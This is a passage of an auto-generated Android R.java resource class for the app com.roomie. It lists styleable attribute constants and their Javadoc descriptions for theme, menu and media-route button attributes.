"<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:editTextStyle */ public static final int MaterialComponentsTheme_editTextStyle = 4; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#floatingActionButtonStyle} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>May be an integer value, such as "<code>100</code>". <p>May be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>May be a floating point value, such as "<code>1.2</code>". <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>May be a fractional value, which is a floating point number appended with either % or %p, such as "<code>14.5%</code>". The % suffix always means a percentage of the base size; the optional %p suffix provides a size relative to some parent container. @attr name com.roomie:floatingActionButtonStyle */ public static final int MaterialComponentsTheme_floatingActionButtonStyle = 11; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#materialButtonStyle} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:materialButtonStyle */ public static final int MaterialComponentsTheme_materialButtonStyle = 12; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#materialCardViewStyle} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:materialCardViewStyle */ public static final int MaterialComponentsTheme_materialCardViewStyle = 13; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#navigationViewStyle} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:navigationViewStyle */ public static final int MaterialComponentsTheme_navigationViewStyle = 14; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#scrimBackground} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". @attr name com.roomie:scrimBackground */ public static final int MaterialComponentsTheme_scrimBackground = 15; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#snackbarButtonStyle} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:snackbarButtonStyle */ public static final int MaterialComponentsTheme_snackbarButtonStyle = 31; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabStyle} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:tabStyle */ public static final int MaterialComponentsTheme_tabStyle = 16; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textAppearanceBody1} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:textAppearanceBody1 */ public static final int MaterialComponentsTheme_textAppearanceBody1 = 17; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textAppearanceBody2} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:textAppearanceBody2 */ public static final int MaterialComponentsTheme_textAppearanceBody2 = 18; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textAppearanceButton} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:textAppearanceButton */ public static final int MaterialComponentsTheme_textAppearanceButton = 19; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textAppearanceCaption} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:textAppearanceCaption */ public static final int MaterialComponentsTheme_textAppearanceCaption = 20; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textAppearanceHeadline1} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:textAppearanceHeadline1 */ public static final int MaterialComponentsTheme_textAppearanceHeadline1 = 21; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textAppearanceHeadline2} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:textAppearanceHeadline2 */ public static final int MaterialComponentsTheme_textAppearanceHeadline2 = 22; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textAppearanceHeadline3} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:textAppearanceHeadline3 */ public static final int MaterialComponentsTheme_textAppearanceHeadline3 = 23; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textAppearanceHeadline4} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:textAppearanceHeadline4 */ public static final int MaterialComponentsTheme_textAppearanceHeadline4 = 24; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textAppearanceHeadline5} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:textAppearanceHeadline5 */ public static final int MaterialComponentsTheme_textAppearanceHeadline5 = 25; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textAppearanceHeadline6} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:textAppearanceHeadline6 */ public static final int MaterialComponentsTheme_textAppearanceHeadline6 = 26; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textAppearanceOverline} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:textAppearanceOverline */ public static final int MaterialComponentsTheme_textAppearanceOverline = 27; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textAppearanceSubtitle1} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:textAppearanceSubtitle1 */ public static final int MaterialComponentsTheme_textAppearanceSubtitle1 = 28; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textAppearanceSubtitle2} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:textAppearanceSubtitle2 */ public static final int MaterialComponentsTheme_textAppearanceSubtitle2 = 29; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textInputStyle} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:textInputStyle */ public static final int MaterialComponentsTheme_textInputStyle = 30; /** Attributes that can be used with a MediaRouteButton. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #MediaRouteButton_android_minHeight android:minHeight}</code></td><td></td></tr> <tr><td><code>{@link #MediaRouteButton_android_minWidth android:minWidth}</code></td><td></td></tr> <tr><td><code>{@link #MediaRouteButton_externalRouteEnabledDrawable com.roomie:externalRouteEnabledDrawable}</code></td><td> This drawable is a state list where the "checked" state indicates active media routing.</td></tr> <tr><td><code>{@link #MediaRouteButton_mediaRouteButtonTint com.roomie:mediaRouteButtonTint}</code></td><td> Tint to apply to the media route button </td></tr> </table> @see #MediaRouteButton_android_minHeight @see #MediaRouteButton_android_minWidth @see #MediaRouteButton_externalRouteEnabledDrawable @see #MediaRouteButton_mediaRouteButtonTint */ public static final int[] MediaRouteButton = { 0x0101013f, 0x01010140, 0x7f01001b, 0x7f01001c }; /** <p>This symbol is the offset where the {@link android.R.attr#minHeight} attribute's value can be found in the {@link #MediaRouteButton} array. @attr name android:minHeight */ public static final int MediaRouteButton_android_minHeight = 1; /** <p>This symbol is the offset where the {@link android.R.attr#minWidth} attribute's value can be found in the {@link #MediaRouteButton} array. @attr name android:minWidth */ public static final int MediaRouteButton_android_minWidth = 0; /** <p> @attr description This drawable is a state list where the "checked" state indicates active media routing. Checkable indicates connecting and non-checked / non-checkable indicates that media is playing to the local device only. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:externalRouteEnabledDrawable */ public static final int MediaRouteButton_externalRouteEnabledDrawable = 2; /** <p> @attr description Tint to apply to the media route button <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:mediaRouteButtonTint */ public static final int MediaRouteButton_mediaRouteButtonTint = 3; /** Attributes that can be used with a MenuGroup. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #MenuGroup_android_checkableBehavior android:checkableBehavior}</code></td><td> Whether the items are capable of displaying a check mark.</td></tr> <tr><td><code>{@link #MenuGroup_android_enabled android:enabled}</code></td><td> Whether the items are enabled.</td></tr> <tr><td><code>{@link #MenuGroup_android_id android:id}</code></td><td> The ID of the group.</td></tr> <tr><td><code>{@link #MenuGroup_android_menuCategory android:menuCategory}</code></td><td> The category applied to all items within this group.</td></tr> <tr><td><code>{@link #MenuGroup_android_orderInCategory android:orderInCategory}</code></td><td> The order within the category applied to all items within this group.</td></tr> <tr><td><code>{@link #MenuGroup_android_visible android:visible}</code></td><td> Whether the items are shown/visible.</td></tr> </table> @see #MenuGroup_android_checkableBehavior @see #MenuGroup_android_enabled @see #MenuGroup_android_id @see #MenuGroup_android_menuCategory @see #MenuGroup_android_orderInCategory @see #MenuGroup_android_visible */ public static final int[] MenuGroup = { 0x0101000e, 0x010100d0, 0x01010194, 0x010101de, 0x010101df, 0x010101e0 }; /** <p> @attr description Whether the items are capable of displaying a check mark. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#checkableBehavior}. @attr name android:checkableBehavior */ public static final int MenuGroup_android_checkableBehavior = 5; /** <p> @attr description Whether the items are enabled. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#enabled}. @attr name android:enabled */ public static final int MenuGroup_android_enabled = 0; /** <p> @attr description The ID of the group. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#id}. @attr name android:id */ public static final int MenuGroup_android_id = 1; /** <p> @attr description The category applied to all items within this group. (This will be or'ed with the orderInCategory attribute.) <p>This corresponds to the global attribute resource symbol {@link android.R.attr#menuCategory}. @attr name android:menuCategory */ public static final int MenuGroup_android_menuCategory = 3; /** <p> @attr description The order within the category applied to all items within this group. (This will be or'ed with the category attribute.) <p>This corresponds to the global attribute resource symbol {@link android.R.attr#orderInCategory}. @attr name android:orderInCategory */ public static final int MenuGroup_android_orderInCategory = 4; /** <p> @attr description Whether the items are shown/visible. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#visible}. @attr name android:visible */ public static final int MenuGroup_android_visible = 2; /** Attributes that can be used with a MenuItem. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #MenuItem_actionLayout com.roomie:actionLayout}</code></td><td> An optional layout to be used as an action view.</td></tr> <tr><td><code>{@link #MenuItem_actionProviderClass com.roomie:actionProviderClass}</code></td><td> The name of an optional ActionProvider class to instantiate an action view and perform operations such as default action for that menu item.</td></tr> <tr><td><code>{@link #MenuItem_actionViewClass com.roomie:actionViewClass}</code></td><td> The name of an optional View class to instantiate and use as an action view.</td></tr> <tr><td><code>{@link #MenuItem_alphabeticModifiers com.roomie:alphabeticModifiers}</code></td><td> The alphabetic modifier key.</td></tr> <tr><td><code>{@link #MenuItem_android_alphabeticShortcut android:alphabeticShortcut}</code></td><td> The alphabetic shortcut key.</td></tr> <tr><td><code>{@link #MenuItem_android_checkable android:checkable}</code></td><td> Whether the item is capable of displaying a check mark.</td></tr> <tr><td><code>{@link #MenuItem_android_checked android:checked}</code></td><td> Whether the item is checked.</td></tr> <tr><td><code>{@link #MenuItem_android_enabled android:enabled}</code></td><td> Whether the item is enabled.</td></tr> <tr><td><code>{@link #MenuItem_android_icon android:icon}</code></td><td> The icon associated with this item.</td></tr> <tr><td><code>{@link #MenuItem_android_id android:id}</code></td><td> The ID of the item.</td></tr> <tr><td><code>{@link #MenuItem_android_menuCategory android:menuCategory}</code></td><td> The category applied to the item.</td></tr> <tr><td><code>{@link #MenuItem_android_numericShortcut android:numericShortcut}</code></td><td> The numeric shortcut key.</td></tr> <tr><td><code>{@link #MenuItem_android_onClick android:onClick}</code></td><td> Name of a method on the Context used to inflate the menu that will be called when the item is clicked.</td></tr> <tr><td><code>{@link #MenuItem_android_orderInCategory android:orderInCategory}</code></td><td> The order within the category applied to the item.</td></tr> <tr><td><code>{@link #MenuItem_android_title android:title}</code></td><td> The title associated with the item.</td></tr> <tr><td><code>{@link #MenuItem_android_titleCondensed android:titleCondensed}</code></td><td> The condensed title associated with the item.</td></tr> <tr><td><code>{@link #MenuItem_android_visible android:visible}</code></td><td> Whether the item is shown/visible.</td></tr> <tr><td><code>{@link #MenuItem_contentDescription com.roomie:contentDescription}</code></td><td> The content description associated with the item.</td></tr> <tr><td><code>{@link #MenuItem_iconTint com.roomie:iconTint}</code></td><td> Tint to apply to the icon.</td></tr> <tr><td><code>{@link #MenuItem_iconTintMode com.roomie:iconTintMode}</code></td><td> Blending mode used to apply the icon tint.</td></tr> <tr><td><code>{@link #MenuItem_numericModifiers com.roomie:numericModifiers}</code></td><td> The numeric modifier key.</td></tr> <tr><td><code>{@link #MenuItem_showAsAction com.roomie:showAsAction}</code></td><td> How this item should display in the Action Bar, if present.</td></tr> <tr><td><code>{@link #MenuItem_tooltipText com.roomie:tooltipText}</code></td><td> The tooltip text associated with the item.</td></tr> </table> @see #MenuItem_actionLayout @see #MenuItem_actionProviderClass @see #MenuItem_actionViewClass @see #MenuItem_alphabeticModifiers @see #MenuItem_android_alphabeticShortcut @see #MenuItem_android_checkable @see #MenuItem_android_checked @see #MenuItem_android_enabled @see #MenuItem_android_icon @see #MenuItem_android_id @see #MenuItem_android_menuCategory @see #MenuItem_android_numericShortcut @see #MenuItem_android_onClick @see #MenuItem_android_orderInCategory @see #MenuItem_android_title @see #MenuItem_android_titleCondensed @see #MenuItem_android_visible @see #MenuItem_contentDescription @see #MenuItem_iconTint @see #MenuItem_iconTintMode @see #MenuItem_numericModifiers @see #MenuItem_showAsAction @see #MenuItem_tooltipText */ public static final int[] MenuItem = { 0x01010002, 0x0101000e, 0x010100d0, 0x01010106, 0x01010194, 0x010101de, 0x010101df, 0x010101e1, 0x010101e2, 0x010101e3, 0x010101e4, 0x010101e5, 0x0101026f, 0x7f0100e6, 0x7f0100e7, 0x7f0100e8, 0x7f0100e9, 0x7f0100ea, 0x7f0100eb, 0x7f0100ec, 0x7f0100ed, 0x7f0100ee, 0x7f0100ef }; /** <p> @attr description An optional layout to be used as an action view. See {@link android.view.MenuItem#setActionView(android.view.View)} for more info. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionLayout */ public static final int MenuItem_actionLayout = 16; /** <p> @attr description The name of an optional ActionProvider class to instantiate an action view and perform operations such as default action for that menu item. See {@link android.view.MenuItem#setActionProvider(android.view.ActionProvider)} for more info. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:actionProviderClass */ public static final int MenuItem_actionProviderClass = 18; /** <p> @attr description The name of an optional View class to instantiate and use as an action view. See {@link android.view.MenuItem#setActionView(android.view.View)} for more info. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:actionViewClass */ public static final int MenuItem_actionViewClass = 17; /** <p> @attr description The alphabetic modifier key. This is the modifier when using a keyboard with alphabetic keys. The values should be kept in sync with KeyEvent <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>META</code></td><td>0x10000</td><td></td></tr> <tr><td><code>CTRL</code></td><td>0x1000</td><td></td></tr> <tr><td><code>ALT</code></td><td>0x02</td><td></td></tr> <tr><td><code>SHIFT</code></td><td>0x1</td><td></td></tr> <tr><td><code>SYM</code></td><td>0x4</td><td></td></tr> <tr><td><code>FUNCTION</code></td><td>0x8</td><td></td></tr> </table> <p>This is a private symbol. @attr name com.roomie:alphabeticModifiers */ public static final int MenuItem_alphabeticModifiers = 13; /** <p> @attr description The alphabetic shortcut key. This is the shortcut when using a keyboard with alphabetic keys. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#alphabeticShortcut}. @attr name android:alphabeticShortcut */ public static final int MenuItem_android_alphabeticShortcut = 9; /** <p> @attr description Whether the item is capable of displaying a check mark. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#checkable}. @attr name android:checkable */ public static final int MenuItem_android_checkable = 11; /** <p> @attr description Whether the item is checked. Note that you must first have enabled checking with the checkable attribute or else the check mark will not appear. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#checked}. @attr name android:checked */ public static final int MenuItem_android_checked = 3; /** <p> @attr description Whether the item is enabled. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#enabled}. @attr name android:enabled */ public static final int MenuItem_android_enabled = 1; /** <p> @attr description The icon associated with this item. This icon will not always be shown, so the title should be sufficient in describing this item. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#icon}. @attr name android:icon */ public static final int MenuItem_android_icon = 0; /** <p> @attr description The ID of the item. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#id}. @attr name android:id */ public static final int MenuItem_android_id = 2; /** <p> @attr description The category applied to the item. (This will be or'ed with the orderInCategory attribute.) <p>This corresponds to the global attribute resource symbol {@link android.R.attr#menuCategory}. @attr name android:menuCategory */ public static final int MenuItem_android_menuCategory = 5; /** <p> @attr description The numeric shortcut key. This is the shortcut when using a numeric (e.g., 12-key) keyboard. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#numericShortcut}. @attr name android:numericShortcut */ public static final int MenuItem_android_numericShortcut = 10; /** <p> @attr description Name of a method on the Context used to inflate the menu that will be called when the item is clicked. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#onClick}. @attr name android:onClick */ public static final int MenuItem_android_onClick = 12; /** <p> @attr description The order within the category applied to the item. (This will be or'ed with the category attribute.) <p>This corresponds to the global attribute resource symbol {@link android.R.attr#orderInCategory}. @attr name android:orderInCategory */ public static final int MenuItem_android_orderInCategory = 6; /** <p> @attr description The title associated with the item. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#title}. @attr name android:title */ public static final int MenuItem_android_title = 7; /** <p> @attr description The condensed title associated with the item. This is used in situations where the normal title may be too long to be displayed. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#titleCondensed}. @attr name android:titleCondensed */ public static final int MenuItem_android_titleCondensed = 8; /** <p> @attr description Whether the item is shown/visible. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#visible}. @attr name android:visible */ public static final int MenuItem_android_visible = 4; /** <p> @attr description The content description associated with the item. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentDescription */ public static final int MenuItem_contentDescription = 19; /** <p> @attr description Tint to apply to the icon. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:iconTint */ public static final int MenuItem_iconTint = 21; /** <p> @attr description Blending mode used to apply the icon tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the icon. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the icon. The icon’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the icon, but with the icon’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the icon with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and icon color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:iconTintMode */ public static final int MenuItem_iconTintMode = 22; /** <p> @attr description The numeric modifier key. This is the modifier when using a numeric (e.g., 12-key) keyboard. The values should be kept in sync with KeyEvent <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>META</code></td><td>0x10000</td><td></td></tr> <tr><td><code>CTRL</code></td><td>0x1000</td><td></td></tr> <tr><td><code>ALT</code></td><td>0x02</td><td></td></tr> <tr><td><code>SHIFT</code></td><td>0x1</td><td></td></tr> <tr><td><code>SYM</code></td><td>0x4</td><td></td></tr> <tr><td><code>FUNCTION</code></td><td>0x8</td><td></td></tr> </table> <p>This is a private symbol. @attr name com.roomie:numericModifiers */ public static final int MenuItem_numericModifiers = 14; /** <p> @attr description How this item should display in the Action Bar, if present. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>never</code></td><td>0</td><td> Never show this item in an action bar, show it in the overflow menu instead. Mutually exclusive with "ifRoom" and "always". </td></tr> <tr><td><code>ifRoom</code></td><td>1</td><td> Show this item in an action bar if there is room for it as determined by the system. Favor this option over "always" where possible. Mutually exclusive with "never" and "always". </td></tr> <tr><td><code>always</code></td><td>2</td><td> Always show this item in an actionbar, even if it would override the system's limits of how much stuff to put there. This may make your action bar look bad on some screens. In most cases you should use "ifRoom" instead. Mutually exclusive with "ifRoom" and "never". </td></tr> <tr><td><code>withText</code></td><td>4</td><td> When this item is shown as an action in the action bar, show a text label with it even if it has an icon representation. </td></tr> <tr><td><code>collapseActionView</code></td><td>8</td><td> This item's action view collapses to a normal menu item. When expanded, the action view takes over a larger segment of its container. </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:showAsAction */ public static final int MenuItem_showAsAction = 15; /** <p> @attr description The tooltip text associated with the item. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:tooltipText */ public static final int MenuItem_tooltipText = 20; /** Attributes that can be used with a MenuView. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #MenuView_android_headerBackground android:headerBackground}</code></td><td> Default background for the menu header.</td></tr> <tr><td><code>{@link #MenuView_android_horizontalDivider android:horizontalDivider}</code></td><td> Default horizontal divider between rows of menu items.</td></tr> <tr><td><code>{@link #MenuView_android_itemBackground android:itemBackground}</code></td><td> Default background for each menu item.</td></tr> <tr><td><code>{@link #MenuView_android_itemIconDisabledAlpha android:itemIconDisabledAlpha}</code></td><td> Default disabled icon alpha for each menu item that shows an icon.</td></tr> <tr><td><code>{@link #MenuView_android_itemTextAppearance android:itemTextAppearance}</code></td><td> Default appearance of menu item text.</td></tr> <tr><td><code>{@link #MenuView_android_verticalDivider android:verticalDivider}</code></td><td> Default vertical divider between menu items.</td></tr> <tr><td><code>{@link #MenuView_android_windowAnimationStyle android:windowAnimationStyle}</code></td><td> Default animations for the menu.</td></tr> <tr><td><code>{@link #MenuView_preserveIconSpacing com.roomie:preserveIconSpacing}</code></td><td> Whether space should be reserved in layout when an icon is missing.</td></tr> <tr><td><code>{@link #MenuView_subMenuArrow com.roomie:subMenuArrow}</code></td><td> Drawable for the arrow icon indicating a particular item is a submenu.</td></tr> </table> @see #MenuView_android_headerBackground @see 